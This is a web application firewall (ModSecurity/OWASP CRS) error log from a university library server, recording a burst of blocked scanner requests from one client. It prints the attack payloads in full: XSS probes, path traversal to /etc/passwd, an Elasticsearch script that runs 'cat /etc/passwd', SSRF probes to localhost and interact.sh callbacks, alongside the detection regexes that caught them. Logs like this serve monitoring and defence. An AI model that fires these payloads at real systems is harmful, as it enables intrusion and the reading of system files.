[Tue Aug 29 11:56:34.562874 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAq@smUAAAAM"]
[Tue Aug 29 11:56:36.552507 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAq@smoAAAAM"]
[Tue Aug 29 11:56:36.693060 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAoz8LcAAAAS"]
[Tue Aug 29 11:56:37.535129 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAqeFq0AAAAx"]
[Tue Aug 29 11:56:39.612197 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAArZPxwAAAAC"]
[Tue Aug 29 11:56:39.686390 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAAq-HdcAAAAT"]
[Tue Aug 29 11:56:39.879415 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArIAWkAAAAX"]
[Tue Aug 29 11:56:40.534989 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq3bBMAAAAI"]
[Tue Aug 29 11:56:40.812819 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAocylsAAAAR"]
[Tue Aug 29 11:56:42.722486 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAqsV-0AAAAB"]
[Tue Aug 29 11:56:43.531238 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAolK4YAAAAe"]
[Tue Aug 29 11:56:43.711475 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAArB14gAAAAV"]
[Tue Aug 29 11:56:44.596492 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAApbUygAAAAh"]
[Tue Aug 29 11:56:45.557756 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:746510/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAq5@U8AAAAK"]
[Tue Aug 29 11:56:46.625467 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAArZP0sAAAAC"]
[Tue Aug 29 11:56:46.750688 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:605331/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAArZP1EAAAAC"]
[Tue Aug 29 11:56:47.610660 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAArZP1sAAAAC"]
[Tue Aug 29 11:56:47.696967 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAq5@WMAAAAK"]
[Tue Aug 29 11:56:48.529033 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAocyokAAAAR"]
[Tue Aug 29 11:56:48.643641 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAq5@WYAAAAK"]
[Tue Aug 29 11:56:50.621500 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAq-HhUAAAAT"]
[Tue Aug 29 11:56:51.665273 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "digilibfkip.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAAolK8AAAAAe"]
[Tue Aug 29 11:56:52.652664 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAq-HhwAAAAT"]
[Tue Aug 29 11:56:52.843569 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAArIAb4AAAAX"]
[Tue Aug 29 11:56:54.644743 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAq-HiwAAAAT"]
[Tue Aug 29 11:56:56.254809 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAArB17gAAAAV"]
[Tue Aug 29 11:56:57.719055 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAq-HkQAAAAT"]
[Tue Aug 29 11:56:59.659204 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAolLAEAAAAe"]
[Tue Aug 29 11:57:01.039350 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAnEqVMAAAAO"]
